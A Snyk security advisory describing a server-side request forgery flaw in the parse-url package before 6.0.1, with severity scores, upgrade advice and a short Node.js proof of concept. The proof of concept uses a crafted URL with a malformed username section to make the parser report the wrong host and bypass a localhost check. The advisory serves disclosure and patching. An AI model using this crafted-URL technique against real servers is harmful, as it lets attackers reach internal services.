Server-side Request Forgery (SSRF) Affecting org.webjars.npm:parse-url package, versions [,6.0.1)


0.0
critical

Snyk CVSS

    Attack Complexity Low
    Integrity High
    Availability High

    Threat Intelligence

    Exploit Maturity Proof of concept
    EPSS 0.19% (57th percentile)
Expand this section
NVD
9.8 critical

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk ID SNYK-JAVA-ORGWEBJARSNPM-2936250
  • published 28 Jun 2022
  • disclosed 28 Jun 2022
  • credit Pocas

How to fix?

Upgrade org.webjars.npm:parse-url to version 6.0.1 or higher.

Overview

org.webjars.npm:parse-url is an An advanced url parser supporting git urls too.

Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF) in the parseUrl function, due to mishandling hostnames when processing usernames and passwords.

PoC:

const parseUrl = require("parse-url");
const express = require('express');
const http = require('http');
const app = express();

const isLocal = () => (req, res, next) => (req.connection.remoteAddress === '::ffff:127.0.0.1'|| req.connection.remoteAddress === '::1' ? true:false)
    ? next()
    : res.json({'state':'You\'re not locally'});

parsed = parseUrl("http://google:com:@@127.0.0.1:9999/ssrf_check");
console.log(parsed);

app.get('/', (req, res) => {
    if(parsed.resource == '127.0.0.1'){
        res.send('Not good');
    } else{
        http.get(parsed.href)
        res.send('Good');
    }
});

app.get('/ssrf_check', isLocal(), (req, res) =>{
    console.log('ssrf bypass');
    res.send(true);
});

app.listen(9999);